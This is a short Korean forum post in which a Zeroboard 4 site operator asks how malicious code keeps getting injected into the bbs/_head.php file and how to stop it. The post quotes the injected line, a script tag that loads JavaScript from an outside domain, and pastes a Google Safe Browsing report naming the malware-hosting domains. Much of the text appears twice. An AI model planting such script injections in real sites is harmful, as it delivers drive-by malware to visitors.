묻고답하기
보안 취약점 해결 방법
2011.04.11 10:22
인터넷을 많이 뒤져봤는데 뚜렷한 해결책을 못찾아서 여기에 질문을 올려봅니다.
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)
현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.
그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.
bbs/_head.php 라는 파일의 가장 마지막줄에
<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>
라는 내용이 삽입되어서
_head.php를 인클루드하고 있는 모든 페이지들이
영향을 받고 있습니다.
script태그의 src 내용은 매번 바뀝니다.
구글의 안전브라우징 진단검사는 아래와 같습니다.
혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지
그리고 해결법을 알고 계신분 있으신가요???
(이미 해결책이 있는데 제가 잘 이해를 못한 것일 수도 있고요)
현재 제로보드4 버전을 사용해서 운영중인 홈페이지가 있습니다.
그런데 계속 악성코드가 삽입되어서 골머리를 썩고 있습니다.
bbs/_head.php 라는 파일의 가장 마지막줄에
<?ob_start();?><script src="http://www.wsart.net/bbs/data/js/common.js></script>
라는 내용이 삽입되어서
_head.php를 인클루드하고 있는 모든 페이지들이
영향을 받고 있습니다.
script태그의 src 내용은 매번 바뀝니다.
구글의 안전브라우징 진단검사는 아래와 같습니다.
Google이 사이트를 방문했을 때의 결과
지난 90일간 진행된 사이트 테스트에서 68개의 페이지 가운데 8개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-04-10이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-04-10입니다.Malicious software includes 3 scripting exploit(s), 3 exploit(s). Successful infection resulted in an average of 4 new process(es) on the target machine.
wkmg.co.kr/, sporam.com/을(를) 포함한 2개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.
interbar.co.kr/을(를) 비롯한 1개의 도메인이 이 사이트 방문자에게 악성코드를 유포하는 중개 역할을 한 것으로 나타났습니다.
This site was hosted on 1 network(s) including AS3786 (ERX).
혹시 이 취약점이 어떤 방식으로 해서 들어오는것인지
그리고 해결법을 알고 계신분 있으신가요???
